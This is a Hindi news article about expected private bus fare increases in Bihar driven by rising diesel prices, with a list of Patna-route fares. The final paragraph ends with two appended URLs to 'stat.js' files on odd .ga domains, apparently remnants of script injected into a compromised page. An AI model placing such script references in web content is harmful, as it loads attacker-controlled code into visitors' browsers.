#

भारत में बढ़ते पेट्रोल और डीजल की कीमत की मार पूरी जनता झेल रही है। अब बस संचालक भी यात्रियों को बड़ा झटका देने की तैयारी में है क्योंकि बस संचालक भी अब किराया बढ़ाने के मूड में है. लॉक डाउन के बाद डीजल की कीमतों में बीते 20 दिनों के भीतर ₹10 की वृद्धि की गई है।

इस कारण बस संचालकों को भी परिचालन करना महंगा पड़ रहा है इसको देखते हुए बस संचालक ने अपने किराए में 25 से 30% तक की वृद्धि की घोषणा कर सकते हैं. बता दें कि पूरे राज्य में 65 हजार से अधिक निजी बसें एवं बिहार राज्य पथ परिवहन निगम की बसें चलती हैं।

बीते साल बस के किराए में 20% तक की वृद्धि की गई थी, आज से 1 साल पहले पटना से मुजफ्फरपुर के बस का किराया जहां 90 रुपैया था उसे बढ़ाकर ₹110 कर दिया गया था और अब अगर 30% की वृद्धि होती है तो यह किराया ₹143 हो जाएगा।

असल में देखा जाए तो कोरोनावायरस के कारण यात्री बस में सवारी बहुत जरूरत पड़ने पर ही यात्रा कर रहे हैं. ऐसे में डीजल की कीमतों में वृद्धि के बाद संचालकों के लिए बसों का संचालन करना और महंगा हो गया. आज हम आपको बिहार में विभिन्न रूटो पर चल रहे बसों का किराया के बारे में बताते है।

पटना से मोतिहारी के लिए एसी बस का किराया 240 और नॉन एसी बस का किराया ₹200 निर्धारित है. पटना से मुजफ्फरपुर एसी बस का किराया 140 एवं नॉन एसी बस का किराया ₹110 निर्धारित है. पटना से बेतिया के लिए एसी बस का किराया ₹300 एवं नॉन एसी बस का किराया ₹260 निर्धारित है।

पटना से सीतामढ़ी के लिए एसी बस का किराया ₹220 एवं नॉन एसी बस का किराया ₹190 निर्धारित है. पटना से दरभंगा का किराया ₹180 एसी बस का एवं नॉन एसी बस का ₹150 निर्धारित है. पटना से मधुबनी का ₹240 एसी बस का एवं नॉन एसी बस के लिए ₹200 किराया निर्धारित है।

पटना से सिलीगुड़ी का एसी बस का किराया ₹600 एवं नॉन एसी बस के लिए ₹550 निर्धारित है. पटना से रांची के लिए एसी बस का किराया ₹350 एवं एसी बस का किराया ₹300 निर्धारित है. पटना से टाटा के लिए एसी बस का किराया ₹650 एवं ननएसी बस का किराया ₹600 निर्धारित है. पटना से पूर्णिया का किराया एसी बस के लिए ₹350 एवं ना एसी बस के लिए ₹300 निर्धारित है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published. Required fields are marked *